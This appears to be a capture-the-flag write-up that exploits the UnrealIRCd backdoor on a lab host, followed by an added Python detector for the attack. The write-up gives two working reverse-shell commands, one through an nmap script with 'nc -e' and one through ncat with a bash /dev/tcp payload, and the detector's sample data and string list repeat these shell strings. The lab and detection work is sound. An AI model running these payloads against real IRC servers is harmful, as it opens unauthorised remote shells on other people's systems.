Exploitation

Method 1

Set up your nc listener and run the following nmap script:

nmap -p 6697 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.28 4444" 10.10.10.117
Connection Established!

Method 2

We can also exploit the service manually, gaining access to the system with ncat.

We get a response from IRC via ping, as shown on the left-hand side, which shows it is vulnerable to command execution.
echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.28/1234 0>&1' " | ncat 10.10.10.117 6697
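
The detection side of the request above, as an added example that is not part of the original write-up: it scans reassembled client-to-server IRC bytes for lines that start with the AB prefix used in the command above and rates them by the shell strings they carry. The function names, severity labels and sample addresses are assumptions made for the illustration.

```python
# Added example: flag IRC client lines that start with the "AB" prefix
# used in the command above. Names and sample data are assumptions.
SHELL_HINTS = (b"/dev/tcp/", b"nc -e", b"bash -i", b"/bin/bash", b"/bin/sh")


def inspect_stream(src, data):
    """Return one finding per client line in `data` that starts with b"AB"."""
    findings = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line.startswith(b"AB"):
            continue
        # Text after the prefix is what the request asks the host to run.
        command = line[2:].lstrip(b"; ").decode("latin-1").strip()
        hints = [h.decode() for h in SHELL_HINTS if h in line]
        findings.append({
            "src": src,
            "command": command,
            "severity": "high" if hints else "medium",
            "hints": hints,
        })
    return findings


# Constructed sample: reassembled client-to-server bytes per source address.
SAMPLE = {
    "192.0.2.10": b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #ops\r\n",
    "192.0.2.66": b"AB; bash -c 'bash -i >& /dev/tcp/192.0.2.66/1234 0>&1' \n",
    "192.0.2.77": b"AB; id\n",
    "192.0.2.20": b"AWAY :ABsent for lunch\r\nADMIN\r\n",
}


def scan(sample=SAMPLE):
    """Run inspect_stream over every source in the sample capture."""
    out = []
    for src, data in sample.items():
        out.extend(inspect_stream(src, data))
    return out


if __name__ == "__main__":
    for f in scan():
        print(f"{f['severity']:6} {f['src']:12} {f['command']!r} hints={f['hints']}")
```

Feed it plaintext stream contents, for example from a network sensor's TCP reassembly on the IRC port.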
